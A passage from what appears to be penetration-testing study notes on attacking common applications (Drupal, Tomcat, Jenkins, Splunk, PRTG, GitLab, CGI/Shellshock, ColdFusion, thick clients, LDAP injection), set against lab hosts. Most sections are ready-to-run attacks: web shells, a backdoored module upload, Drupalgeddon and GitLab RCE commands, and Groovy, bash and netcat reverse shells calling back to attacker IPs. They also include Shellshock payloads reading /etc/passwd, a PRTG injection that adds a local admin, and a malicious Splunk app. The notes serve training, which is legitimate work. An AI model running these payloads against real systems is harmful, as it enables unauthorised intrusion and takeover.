"http://drupal-qa.inlanefreight.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id" +``` + +Drupal 8 removed the module from core — download and install it manually (`Reports → Available updates → Install new module`), then exploit identically. + +**RCE — backdoored module upload (any version).** Drupal blocks direct access to `/modules`, so bundle an `.htaccess` that re-enables it alongside your shell inside a legitimate module archive: + +```bash +wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz && tar xvf captcha-8.x-1.2.tar.gz +# shell.php: <?php system($_GET['fe8edbabc5c5c9b7b764504cd22b17af']); ?> +# .htaccess: <IfModule mod_rewrite.c>\n RewriteEngine On\n RewriteBase /\n</IfModule> +mv shell.php .htaccess captcha && tar cvf captcha.tar.gz captcha/ +# Manage → Extend → + Install new module → captcha.tar.gz +curl -s "http://drupal.inlanefreight.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id" +``` + +**Drupalgeddon family:** + +```bash +# CVE-2014-3704 (Drupalgeddon) · pre-auth SQLi, 7.0–7.31 → inserts a rogue admin +python2.7 drupalgeddon.py -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd +# msf: exploit/multi/http/drupal_drupageddon + +# CVE-2018-7600 (Drupalgeddon2) · pre-auth RCE, <7.58 / <8.5.1 +python3 drupalgeddon2.py # edit the PoC's write step to drop a base64 PHP shell instead of hello.txt +curl "http://drupal-dev.inlanefreight.local/mrb3n.php?fe8edbabc5c5c9b7b764504cd22b17af=id" + +# CVE-2018-7602 (Drupalgeddon3) · authenticated RCE (needs node-delete rights + session cookie) +# msf: set DRUPAL_SESSION <cookie> ; set DRUPAL_NODE 1 ; set VHOST drupal-acc.inlanefreight.local +``` + +> [!tip] Prefer the Metasploit modules +> The standalone Drupalgeddon PoCs are Python 2 (end-of-life). `drupal_drupageddon` and `drupal_drupageddon3` do the same job without a legacy interpreter on your attack box. + +--- + +## 5 · Tomcat `fas:Terminal` — 8080/8180, AJP 8009 + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/tomcat.svg" alt="Apache Tomcat logo" style="height:58px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>Apache Tomcat · Java servlet container</span></figcaption> +</figure> + +Apache Tomcat serves Java servlets/JSP and is more common internally than externally. Weak creds on `/manager` or `/host-manager` let you deploy a WAR (a zipped JSP shell) through the GUI or API — near-instant RCE, usually as a very privileged service account. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + A["Footprint: Server header, /docs"] --> B["Find /manager, /host-manager"] + B --> C[Brute the manager login] + C -->|Success| D["Deploy JSP-in-WAR\nvia GUI/API"] + D --> E["Shell as Tomcat account\n(often SYSTEM/root)"] + B -->|No manager| F["AJP 8009 → Ghostcat\nCVE-2020-1938 file read"] + F --> G["Read WEB-INF/web.xml, configs"] +``` + +> [!info] Tomcat layout worth knowing +> `conf/tomcat-users.xml` holds manager credentials and roles (`manager-gui`, `manager-script`, `manager-jmx`, `manager-status`). `webapps/<app>/WEB-INF/web.xml` is the deployment descriptor mapping routes to classes — a prime target for any file-read primitive. + +**Footprint and locate the manager.** The `Server` header leaks the version when a proxy hasn't stripped it; `/docs` is a reliable fallback. Content-discovery confirms the manager apps: + +```bash +curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat # Apache Tomcat 9 (9.0.30) +feroxbuster -u http://web01.inlanefreight.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 50 +# /manager (302) · /host-manager (302) +``` + +**Brute the manager login** (Basic Auth — creds are base64 `user:pass` in the `Authorization` header): + +```bash +msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 10.129.201.58 +msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180 +msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST web01.inlanefreight.local +msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true +msf6 auxiliary(scanner/http/tomcat_mgr_login) > run +# [+] Login Successful: tomcat:admin +``` + +**Deploy a WAR-packaged JSP shell.** A WAR is just a zip; Tomcat auto-extracts uploads and serves them at `/<archive-name>/`: + +```bash +wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp +zip -r backup.war cmd.jsp +# Manager → Deploy → backup.war +curl "http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id" # uid=1001(tomcat) +# Reverse-shell WAR in one line: +# msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war > backup.war +``` + +Undeploy the app after use and record the upload path (`$CATALINA_HOME/webapps/`) for the report. + +**CVE-2020-1938 (Ghostcat)** — unauthenticated AJP file read on Tomcat < 9.0.31 / 8.5.51 / 7.0.100. The AJP connector (normally for front-end proxying) reads files under `webapps/` — not the whole filesystem, but enough to pull `WEB-INF/web.xml`: + +```bash +nmap -sV -p 8009,8080 app-dev.inlanefreight.local # 8009 ajp13 Apache Jserv +python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml +``` + +**CVE-2019-0232** — CGI Servlet command injection, Windows only, with `enableCmdLineArguments` set. The query string isn't sanitised before becoming command-line arguments, so `&` chains a command onto a legitimate `.bat`/`.cmd` CGI script. The special-char filter is bypassable with URL encoding: + +```bash +ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat # welcome.bat +# http://10.129.204.227:8080/cgi/welcome.bat?&dir +# http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe +``` + +--- + +## 6 · Jenkins `fas:Terminal` — 8080 (agent 5000) + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/jenkins.svg" alt="Jenkins butler mascot logo" style="height:88px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>Jenkins · CI/CD automation server</span></figcaption> +</figure> + +Jenkins is a CI server that frequently runs as `SYSTEM` (Windows) or `root` (Linux). Any authenticated access — even anonymous, if misconfigured — reaches the `/script` Groovy console, and Groovy compiles to JVM bytecode running with the full privileges of the Jenkins process. That makes it a fast, privileged foothold straight into an AD environment, skipping local privesc entirely. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart LR + A["Fingerprint login on :8080"] --> B{Auth?} + B -->|None / weak creds| C["/script Groovy console"] + B -->|Anon build+job rights| C + C --> D["Runtime.exec() → reverse shell"] + D --> E["Shell as SYSTEM/root"] +``` + +**Access the console** at `http://jenkins.inlanefreight.local:8000/script`. Run a command: + +```groovy +def cmd = 'id' +def sout = new StringBuffer(), serr = new StringBuffer() +def proc = cmd.execute() +proc.consumeProcessOutput(sout, serr) +proc.waitForOrKill(1000) +println sout +``` + +**Reverse shell (Linux)** — pass the payload as a raw process array to dodge Groovy string-interpolation issues: + +```groovy +r = Runtime.getRuntime() +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p.waitFor() +``` +```bash +nc -lvnp 8443 # → uid=0(root) +``` + +**Windows** — `"cmd.exe /c dir".execute()` runs commands; a PowerShell download cradle or a raw Java-socket reverse shell avoids leaving a permanent change (and dodges PowerShell monitoring). + +> [!tip] Check misconfig before hunting CVEs +> The old chained sandbox-bypass RCEs (CVE-2018-1999002 + CVE-2019-1003000) were fixed by the 2.303.1 LTS. Against a modern install, checking whether anonymous users have read/build/job-create rights is usually more productive than a version-specific exploit. Confirm the LTS version first. + +--- + +## 7 · Splunk `fas:Terminal` — 8000 (mgmt 8089) + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/splunk.svg" alt="Splunk logo" style="height:44px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>Splunk · log analytics / SIEM</span></figcaption> +</figure> + +Splunk has few exploitable CVEs; the risk is weak or absent auth plus built-in functionality. A forgotten Enterprise *trial* silently downgrades to the auth-free *Free* edition after 60 days. Once you have admin — via no auth or weak creds — a custom app with a scripted input runs an arbitrary script on a schedule, as the Splunk service account (often `SYSTEM`/`root`). + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + A["Fingerprint: Splunkd httpd\non 8000/8089"] --> B{Auth?} + B -->|Trial expired → Free| C[Direct admin, no creds] + B -->|Weak default| D["admin:changeme / weak pw"] + C --> E["Custom app: bin/ script +\ndefault/inputs.conf"] + D --> E + E --> F["tar.gz → Install app from file"] + F --> G["Scripted input fires\n→ reverse shell"] + G --> H["Shell as Splunk account\n(often SYSTEM)"] +``` + +**Fingerprint.** Both 8000 and 8089 reporting `Splunkd httpd` is definitive. Try `admin:changeme` (shown on old login pages) and common weak passwords if the trial scenario doesn't apply. + +**Build a malicious app.** Two files: the script Splunk runs, and the `inputs.conf` that schedules it (the `interval` field is mandatory — no interval, no execution): + +```ini +# splunk_shell/default/inputs.conf +[script://.\bin\run.bat] +disabled = 0 +sourcetype = shell +interval = 10 +``` +```batch +:: splunk_shell/bin/run.bat → launches a hidden PowerShell reverse shell +@ECHO OFF +PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'" +Exit +``` + +**Package and upload** — the app enables on upload and fires within `interval` seconds: + +```bash +tar -cvzf updater.tar.gz splunk_shell/ +sudo nc -lnvp 443 +# Manage Apps → Install app from file → updater.tar.gz → Upload → whoami: nt authority\system +``` + +> [!info] Pivot via a deployment server +> If the compromised instance is a Splunk *deployment server*, dropping the app in `$SPLUNK_HOME/etc/deployment-apps` pushes it to every Universal Forwarder that checks in — one box becomes RCE across the fleet. Full Splunk ships Python (great for a Linux payload); Universal Forwarders don't, so use PowerShell on a Windows fleet. + +--- + +## 8 · PRTG Network Monitor `fas:Terminal` — 8080 + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/prtg.svg" alt="PRTG Network Monitor logo" style="height:46px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>PRTG Network Monitor · Paessler</span></figcaption> +</figure> + +PRTG (Paessler, Delphi) is an agentless monitor, rarely internet-facing but common internally (and the HTB box *Netmon*). Default `prtgadmin:prtgadmin` is often pre-filled and unchanged. Once in, CVE-2018-9276 turns a notification's "Execute Program" action into command execution as the PRTG account — frequently local admin. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart LR + A["Fingerprint: Indy httpd\n(Paessler PRTG)"] --> B[Login: default/weak creds] + B --> C["Account Settings → Notifications\n→ Add new"] + C --> D["EXECUTE PROGRAM → outfile.ps1\n+ malicious Parameter"] + D --> E[Click Test → command runs] +``` + +**Fingerprint and version.** `Indy httpd ... Paessler PRTG bandwidth monitor` in the banner is definitive; `17.3.33.2830` predates the 18.2.39 fix: + +```bash +sudo nmap -sV -p- --open -T4 10.129.201.50 +curl -s "http://10.129.201.50:8080/index.htm" -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" | grep version +``` + +**Exploit CVE-2018-9276.** The `Parameter` field is concatenated unsanitised into the PowerShell behind `outfile.ps1`, so a `;` chains your own command. It's blind — PRTG gives no feedback: + +``` +Setup → Account Settings → Notifications → Add new notification +Program File: Demo exe notification - outfile.ps1 +Parameter: test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add +Save → Test +``` + +**Confirm out of band** (scheduling instead of Test also gives lightweight persistence): + +```bash +sudo nxc smb 10.129.201.50 -u prtgadm1 -p 'Pwn3d_by_PRTG!' # (Pwn3d!) = local admin over SMB +``` + +> [!tip] CrackMapExec → NetExec +> `crackmapexec` is superseded by the maintained fork **NetExec (`nxc`)** — same syntax family. On a real test, prefer a reverse shell over adding an account to keep the footprint small. + +--- + +## 9 · osTicket `fas:Terminal` — methodology, not a CVE + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/osticket.png" alt="osTicket logo" style="height:46px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>osTicket · support ticketing</span></figcaption> +</figure> + +osTicket is well-maintained with a thin CVE history, so this section is a *pattern* that applies to any helpdesk (Zendesk, Freshdesk, Jira Service Desk): support portals hand out real company email addresses, and the humans running them leak credentials. This is the chain behind HTB's *Delivery*. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + A["Fingerprint: OSTSESSID cookie,\n'powered by' footer"] --> B["Submit a ticket →\nget a company email address"] + B --> C["Register on other portals\nwith that address"] + A --> D["OSINT breach data (Dehashed)"] + D --> E["Try leaked creds on the portal"] + E --> F["Read closed tickets:\npassword resets, VPN issues"] + F --> G["Reused / new-joiner password\n→ spray other services"] +``` + +**Fingerprint.** Nmap only sees the webserver — the `OSTSESSID` cookie and footer branding identify osTicket. + +**Harvest an address.** Submitting a ticket returns a dedicated reply-to address — a valid company email you can use to self-register on other services requiring email verification. + +**Cross-reference breach data** against the domain: + +```bash +sudo python3 dehashed.py -q inlanefreight.local -p +# email: kevin@inlanefreight.local · username: kgrimes · password: Fish1ng_s3ason! +``` + +Try both username and email on any login — `kevin@…` succeeded where `kgrimes` failed. Then mine the agent's closed tickets: password resets, VPN troubleshooting, and the classic "standard new-joiner password" sent in plaintext are all fair game. Export the address book as a ready-made spray list (`linkedin2username` helps build one from employee names). + +> [!tip] Newer replacements exist +> Dehashed is the module's reference; `Have I Been Pwned` (API-gated) and `intelx.io` are common complements. Keep every breach-data lookup inside the engagement's rules of engagement. + +--- + +## 10 · GitLab `fas:Terminal` — lab port 8081 + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/gitlab.svg" alt="GitLab tanuki logo" style="height:54px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>GitLab · self-hosted Git + CI/CD</span></figcaption> +</figure> + +Self-hosted Git with wikis, issues, and CI/CD. Public and internal repos leak hardcoded secrets, SSH keys, and infra clues. GitLab has a long CVE list, but the most reliable finding is usually that self-registration is on, letting you walk in and browse internal projects. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + A["Fingerprint: login page, logo"] --> B["Browse /explore (public projects)"] + B --> C{Self-registration on?} + C -->|Yes| D["Register → internal projects"] + C -->|No| E["Enumerate users via\n'email already taken'"] + D --> F["Mine repos: secrets, keys, config"] + D --> G["GitLab CE ≤ 13.10.2:\nExifTool metadata RCE"] + G --> H[Shell as git user] +``` + +**Fingerprint and enumerate.** The version only shows on `/help` after login, but `/explore` lists public projects unauthenticated — check it first. Username enumeration works via the registration oracle ("Email has already been taken") even when sign-up is disabled, because `/users/sign_up` stays reachable: + +```bash +./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt +# [+] The username root exists! [+] The username bob exists! +``` + +> [!info] Lockout shapes your brute force +> GitLab's default is 10 failed attempts, 10-minute auto-unlock, not changeable from the UI (it needs a source rebuild). Pace credential attacks against a discovered user list accordingly. GitLab doesn't even class username enumeration as a bug — but it directly feeds spray lists. + +**Register and mine** repos for hardcoded credentials, committed secrets in history, snippets, and stray SSH keys. + +**CVE — GitLab CE ≤ 13.10.2 authenticated RCE via ExifTool** (self-registration makes the required creds trivial): + +```bash +python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 \ + -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f' +nc -lnvp 8443 # → uid=996(git) +``` + +> [!tip] The unauth successor +> CVE-2021-22205 is an *unauthenticated* ExifTool RCE in a slightly later range and the more commonly cited GitLab bug. GitLab patches fast — always match the exact CE/EE version against current advisories before trusting either. + +--- + +## 11 · CGI & Shellshock `fas:Terminal` + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/shellshock.svg" alt="Shellshock vulnerability logo" style="height:76px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>Shellshock · CVE-2014-6271 (Bash)</span></figcaption> +</figure> + +CGI is legacy middleware that hands requests to scripts in `cgi-bin`. It's mostly gone from modern servers but lingers on embedded/IoT gear. The classic attack is Shellshock (CVE-2014-6271): vulnerable Bash (≤ 4.3) mis-parses a function definition in an environment variable and runs anything appended after it — and CGI copies HTTP headers into environment variables. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart LR + A["Discover cgi-bin scripts"] --> B["Test User-Agent header oracle"] + B --> C{Bash bug present?} + C -->|Yes| D["Chain command after\nthe function definition"] + D --> E["Reverse shell as web user"] + C -->|No| F[Patched — move on] +``` + +**Understand the bug** — everything after the closing `};` runs on a vulnerable shell: + +```bash +env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable" +# vulnerable host prints "vulnerable-shellshock" as well +``` + +**Discover a CGI script** (a `200` with zero length still counts — it just produced no output for a GET): + +```bash +feroxbuster -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -t 50 -x cgi +# /access.cgi (200) [Size: 0] +``` + +**Confirm via User-Agent, then shell** — the double `echo ;` gives a clean response separator: + +```bash +# read a file +curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.129.204.231/cgi-bin/access.cgi +# reverse shell +curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi +sudo nc -lvnp 7777 # → www-data +``` + +`Referer` and `Cookie` can be injection points too — any header CGI turns into an environment variable works. + +--- + +## 12 · Thick client applications `fas:Terminal` + +Thick (fat) clients run real logic locally — Java/.NET/C++ CRMs, internal utilities, project tools. They dodge browser bugs (XSS, CSRF) but fall to hardcoded credentials, insecure local storage, DLL hijacking, and — for three-tier apps — the same SQLi/path-traversal you'd find on the web, once you reverse the protocol. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + A["Info gathering:\narchitecture, language, entry points"] --> B["Static: disassemble/decompile"] + A --> C["Dynamic: ProcMon, debugger,\nmemory dump"] + A --> D["Network: Wireshark/Burp\non client↔server traffic"] + B --> E["Patch client logic:\nports, filters, validation"] + D --> E + E --> F["Exploit server bugs:\nSQLi, path traversal"] +``` + +> [!info] Two-tier vs three-tier +> **Two-tier**: client talks straight to the DB — the client binary can potentially reach it directly. **Three-tier**: client → app server → DB. Safer by design, but the middle tier becomes attackable with web-style bugs once you reverse its protocol. +> +> **Toolkit** — reversing: Ghidra, IDA, dnSpyEx, x64dbg, JADX, JD-GUI, de4dot. Dynamic: Process Monitor, Frida, OllyDbg. Network: Wireshark, tcpdump, Burp (for proxyable TCP). + +**Capture a self-cleaning dropper's payload** (the *Restart-Oracle-Service* scenario). The EXE drops a `.bat`, decodes a base64 EXE, runs it, deletes both. Deny delete on the temp folder before re-running so the artefacts survive: + +``` +ProcMon64 → watch %LOCALAPPDATA%\Temp for the dropped file +Temp → Properties → Security → Advanced → Disable inheritance + → deselect "Delete subfolders and files" and "Delete" +Re-run the EXE → the .bat now survives (it base64-decodes oracle.txt → restart-service.exe) +``` + +**Recover hardcoded creds from memory.** In x64dbg, restrict breakpoints to Exit so you land in the app's own code, find an `-RW-` region with an `MZ` header (an in-memory PE hiding from disk AV), and dump it: + +```bash +strings64.exe .\restart-service_00000000001E0000.bin # .NETFramework,Version=v4.0 +# de4dot deobfuscates the dump → dnSpy reads it as near-original C# with creds inline +``` + +**Reverse a client/server app** (*Fatty*, condensed). Patch the hardcoded port in the JAR's Spring config, then strip the JAR's own integrity check so the modified client runs: + +```powershell +Select-String -Path fatty-client\* -Pattern "8000" -Recurse # beans.xml <constructor-arg index="1" value="8000"/> +# edit the port; delete SHA-256 digests from META-INF/MANIFEST.MF and the .RSA/.SF files; jar -cmf to rebuild +``` + +**Bypass client-side access control (path traversal).** The server strips `/` from folder names, but the *client* decides what to send — decompile and patch it to send `..`: + +``` +JD-GUI → decompile → ClientGuiTest.java: currentFolder = "configs" → ".." +javac -cp fatty-client-new.jar ...\ClientGuiTest.java # swap only the patched .class into the JAR +``` + +**SQLi in the decompiled server logic.** The username is concatenated into the query; the password is hashed client-side (`SHA-256(user+pass+secret)`), so `' OR '1'='1` fails the hash compare. A UNION injection supplies every column directly, and patching `setPassword()` to send plaintext makes the client value match the injected literal: + +```java +// server: "SELECT id,username,email,password,role FROM users WHERE username='" + user.getUsername() + "'" +// login: qtc' UNION SELECT 1,'abc','a@a','abc','admin (password: abc) +``` + +> [!tip] Maintained forks +> `dnSpy` is archived — use **dnSpyEx**. **Ghidra** is a fully viable free IDA alternative for native code; reach for IDA only where its decompiler handles a specific architecture better. **Frida** hooks a suspected function without a full static pass. + +--- + +## 13 · ColdFusion `fas:Terminal` — port 8500 + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/coldfusion.svg" alt="Adobe ColdFusion logo" style="height:52px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>Adobe ColdFusion · CFML app server</span></figcaption> +</figure> + +ColdFusion (CFML, Adobe) is Java-based with a recognisable footprint: `.cfm`/`.cfc` extensions, port 8500 for SSL, and `/CFIDE/administrator/`. Older versions carry a traversal that leaks the encrypted datasource store and an unauth RCE via the bundled FCKeditor. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + A["Fingerprint: 8500, .cfm/.cfc,\n/CFIDE/administrator/"] --> B["searchsploit adobe coldfusion"] + B --> C{Version} + C -->|≤ 9.0.1| D["CVE-2010-2861\ntraversal → password.properties"] + C -->|≤ 8.0.1| E["CVE-2009-2265\nFCKeditor unauth RCE"] + E --> F["Upload JSP → shell as CF account"] +``` + +**Fingerprint** on port 8500 + `CFIDE`/`cfdocs` in the webroot; the admin login often discloses the major version. Then match exploits: + +```bash +nmap -p- -sC -Pn 10.129.247.30 --open # 8500/tcp open fmtp +searchsploit adobe coldfusion +# Directory Traversal ............ multiple/remote/14641.py +# ColdFusion 8 - RCE ............. cfm/webapps/50057.py +``` + +**CVE-2010-2861 — traversal to leak `password.properties`** (mishandled `locale` param in several bundled `.cfm` files). Values are encrypted, but it's the credential store for every datasource CF connects to: + +```bash +python2 14641.py 10.129.204.230 8500 "../../../../../../../../ColdFusion8/lib/password.properties" +# password=2F635F... encrypted=true +``` + +**CVE-2009-2265 — unauth RCE via the FCKeditor connector** (`/CFIDE/scripts/ajax/FCKeditor/.../upload.cfm` accepts an arbitrary file upload). The PoC uploads a JSP, triggers it, and cleans up: + +```bash +python3 50057.py # generates + uploads JSP payload, catches the shell as the CF service account +``` + +> [!tip] Both CVEs are CF 8/9-era +> Current ColdFusion (2021/2023) has a very different, hardened surface. Confirm the version from `/CFIDE/administrator` or the `Server` header before assuming either applies; pair `searchsploit` with a manual NVD/vendor check. + +--- + +## 14 · IIS tilde (8.3 short-name) enumeration `fas:Terminal` + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/iis.png" alt="Microsoft IIS logo" style="height:52px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>Microsoft IIS · Windows web server</span></figcaption> +</figure> + +Windows generates a legacy 8.3 short name for every file (`somefi~1.txt`) for DOS compatibility. Some IIS versions answer tilde-prefixed requests differently depending on whether a prefix matches, so you can rebuild hidden names one character at a time — turning "guess the whole filename" into "guess an 8-char prefix". + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart LR + A["Fingerprint IIS, check OPTIONS"] --> B["IIS-ShortName-Scanner"] + B --> C["Partial names, e.g. TRANSF~1.ASP"] + C --> D["Build a targeted wordlist\n(words starting 'transf')"] + D --> E["Fuzz with extensions →\nrecover the full name"] +``` + +**Fingerprint and scan** (the numeric args tune threads/requests; it reports the working HTTP method and every partial name): + +```bash +nmap -p- -sV -sC --open 10.129.224.91 # Microsoft IIS httpd 7.5 +java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/ +# Vulnerable! · method: OPTIONS · dirs: ASPNET~1, UPLOAD~1 · files: CSASPX~1.CS, TRANSF~1.ASP +``` + +**Narrow the partial name into a wordlist, then recover the full filename:** + +```bash +egrep -r ^transf /usr/share/wordlists/* | sed 's/^[^:]*://' > /tmp/list.txt +feroxbuster -u http://10.129.204.231/ -w /tmp/list.txt -t 50 -x aspx,asp +# /transfer.aspx (200) +``` + +> [!tip] It's a legacy behaviour +> Modern IIS/.NET configs often have this disabled. Always let the scanner's own vulnerability check confirm applicability before you spend time building wordlists. + +--- + +## 15 · LDAP injection & mass assignment `fas:Terminal` + +Two source-driven bug classes. LDAP-backed logins that concatenate input into a filter fall to injection (the LDAP cousin of SQLi). Framework "mass assignment" binds a whole form onto a model, letting you set fields — `admin`, `confirmed` — that were never meant to be user-controllable. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + A["nmap: ldap/389 beside web/80"] --> B["Login likely LDAP-backed"] + B --> C["Inject * into user/pass"] + C --> D["(&(objectClass=user)(sAMAccountName=*)(userPassword=*))\nmatches any record"] + D --> E[Auth bypass] +``` + +> [!info] LDAP vs Active Directory +> LDAP is a *protocol* for querying directory data; Active Directory is a directory *service* that speaks LDAP (plus Kerberos, DNS, and more). OpenLDAP is the common cross-platform implementation you meet outside pure-Windows shops. Injection metacharacters: `*` (wildcard), `()` (grouping), `&`/`|` (AND/OR) — `(cn=*)` is the `' OR '1'='1` of LDAP. + +**Query directly** to understand the schema, then look for `ldap/389` next to a web login (a strong hint the login is LDAP-backed): + +```bash +ldapsearch -H ldap://ldap.example.com:389 -D "cn=admin,dc=example,dc=com" -w secret123 \ + -b "ou=people,dc=example,dc=com" "(mail=jdoe@example.com)" +nmap -p- -sC -sV --open --min-rate=1000 10.129.204.229 # 389/tcp OpenLDAP +``` + +**Bypass with a wildcard** — `Username: *` / `Password: *` builds a filter that matches any user with a non-empty password. + +**Mass assignment.** The vulnerable pattern only checks whether a field *exists* — its value is irrelevant: + +```python +try: + if request.form['confirmed']: # existence check only + cond = True +except: + cond = False +``` +``` +# Burp: add a field the real form never exposes +POST /register +username=new&password=test&confirmed=test +``` + +The Rails equivalent (`attr_accessible :username, :email`) breaks the same way — smuggle `admin: true` inside the `user` hash. Modern Rails uses Strong Parameters (`params.require(:user).permit(:username, :email)`), which whitelists — but an over-broad `permit!` re-opens the hole. Fix is always explicit whitelisting, never a blacklist or existence check. + +--- + +## 16 · Applications connecting to services `fas:Terminal` + +Apps that talk to a backend commonly embed a connection string with live credentials in the compiled binary, not a greppable config file. Recover it from two formats — an ELF in a debugger, a .NET DLL in a decompiler — and test the creds for reuse elsewhere. + +```mermaid +%%{init: 